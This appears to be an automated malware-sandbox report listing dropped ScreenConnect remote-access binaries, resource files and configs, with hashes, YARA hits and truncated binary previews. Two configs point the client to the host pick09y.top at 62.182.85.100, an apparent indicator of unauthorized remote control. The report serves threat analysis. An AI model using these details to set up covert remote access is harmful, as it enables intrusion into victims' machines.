                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1721856
                                                                                                                                                                              Entropy (8bit):6.639136400085158
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                              MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                              SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                              SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                              SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):601376
                                                                                                                                                                              Entropy (8bit):6.185921191564225
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                              MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                              SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                              SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                              SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):197120
                                                                                                                                                                              Entropy (8bit):6.58476728626163
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                              MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                              SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                              SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                              SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                              Entropy (8bit):4.646296001566109
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:rHy2DLI4MWonY6c/KItfU49cAjUPDLm184c7eA7d5TlO5FMDKt5cFqu+HIR:zHE4rbM2xjU7M8LD7DTlcFq0qEIR
                                                                                                                                                                              MD5:8B45555EF2300160892C25F453098AA4
                                                                                                                                                                              SHA1:0992EBA6A12F7A25C1F50566BEEB3A72D4B93461
                                                                                                                                                                              SHA-256:75552351B688F153370B86713C443AC7013DF3EE8FCAC004B2AB57501B89B225
                                                                                                                                                                              SHA-512:F99FF9A04675E11BAF1FD2343AB9CE3066BAB32E6BD18AEA9344960BF0A14AF8191DDCCA8431AD52D907BCB0CB47861FFB2CD34655F1852D51E04ED766F03505
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP....4..2...n_Q2T}........Z...5...........0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....RE.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.T.i.t.l.e.F...FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.t.....Support..Support.2Software is Updating.Do not turn off your computer.,Not enough data receiving from host computer..Removed
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):21018
                                                                                                                                                                              Entropy (8bit):7.841465962209068
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:rcoN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dH:P4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bd
                                                                                                                                                                              MD5:EF6DBD4F9C3BB57F1A2C4AF2847D8C54
                                                                                                                                                                              SHA1:41D9329C5719467E8AE8777C2F38DE39F02F6AE4
                                                                                                                                                                              SHA-256:0792210DE652583423688FE6ACAE19F3381622E85992A771BF5E6C5234DBEB8E
                                                                                                                                                                              SHA-512:5D5D0505874DC02832C32B05F7E49EAD974464F6CB50C27CE9393A23FF965AA66971B3C0D98E2A4F28C24147FCA7A0A9BFD25909EC7D5792AD40CED7D51ED839
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF.1P)..../._.ks`.k.`.k.M6pb.......'...........w.......P...1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6..'..(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2..1..0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2..;..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..E..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.xO.. .....PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):50133
                                                                                                                                                                              Entropy (8bit):4.759054454534641
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                              MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                              SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                              SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                              SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):26722
                                                                                                                                                                              Entropy (8bit):7.7401940386372345
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                              MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                              SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                              SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                              SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3343
                                                                                                                                                                              Entropy (8bit):4.771733209240506
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHlHgHyHNHtH29PtxA2oFHX:opPN
                                                                                                                                                                              MD5:9322751577F16A9DB8C25F7D7EDD7D9F
                                                                                                                                                                              SHA1:DC74AD5A42634655BCBA909DB1E2765F7CDDFB3D
                                                                                                                                                                              SHA-256:F1A3457E307D721EF5B63FDB0D5E13790968276862EF043FB62CCE43204606DF
                                                                                                                                                                              SHA-512:BB0C662285D7B95B7FAA05E9CC8675B81B33E6F77B0C50F97C9BC69D30FB71E72A7EAF0AFC71AF0C646E35B9EADD1E504A35D5D25847A29FD6D557F7ABD903AB
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):556
                                                                                                                                                                              Entropy (8bit):5.042876098095699
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO+LCDzv/vXbAa3xT:2dL9hK6E46YPpz3vH
                                                                                                                                                                              MD5:4AC6371353CC59FE5C6E3319405BE7D9
                                                                                                                                                                              SHA1:14CB34BF608AC9B2F4574B67816A219BA953787D
                                                                                                                                                                              SHA-256:F0D7263254C0E2454667E262C923DE0458B26B7FFB6942E89DB544E1020A67B3
                                                                                                                                                                              SHA-512:4D1547FB53DD176906F2C0E1809E23E4D6E93BA6153BA4939179F383F26A45BC94314C88C66390340228D838034227562C16766C0722F5744731354E05508EBD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>pick09y.top=62.182.85.100-07%2f11%2f2024%2017%3a04%3a55</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):556
                                                                                                                                                                              Entropy (8bit):5.042876098095699
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO+LCDzv/vXbAa3xT:2dL9hK6E46YPpz3vH
                                                                                                                                                                              MD5:4AC6371353CC59FE5C6E3319405BE7D9
                                                                                                                                                                              SHA1:14CB34BF608AC9B2F4574B67816A219BA953787D
                                                                                                                                                                              SHA-256:F0D7263254C0E2454667E262C923DE0458B26B7FFB6942E89DB544E1020A67B3
                                                                                                                                                                              SHA-512:4D1547FB53DD176906F2C0E1809E23E4D6E93BA6153BA4939179F383F26A45BC94314C88C66390340228D838034227562C16766C0722F5744731354E05508EBD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>pick09y.top=62.182.85.100-07%2f11%2f2024%2017%3a04%3a55</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):68096
                                                                                                                                                                              Entropy (8bit):6.068776675019683
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                              MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                              SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                              SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                              SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1373
                                                                                                                                                                              Entropy (8bit):5.369201792577388
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                              MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                              SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                              SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                              SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):847
                                                                                                                                                                              Entropy (8bit):5.345615485833535
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                              MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                              SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                              SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                              SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (607), with CRLF line terminators
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):14704
                                                                                                                                                                              Entropy (8bit):3.804091917782712
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:t6BKnBqdl2CE+Lpn15UBBaOy0l+Bqdl2CE+LpnkLKZ/p8mkhkBqdl2CE+LpnpoCA:tFx+FnrUafFx+Fn6q/Fx+FnJnLEv
                                                                                                                                                                              MD5:AA9216C36FC0CB3CD3A0FB75E965F2C2
                                                                                                                                                                              SHA1:F41E2DCE753CE932A20ECB67716AB7492AABFB2F
                                                                                                                                                                              SHA-256:546403423DE5CA21D44E671AA6EABA93AF272FBEDBF15C814EC58E8CEBD0F18D
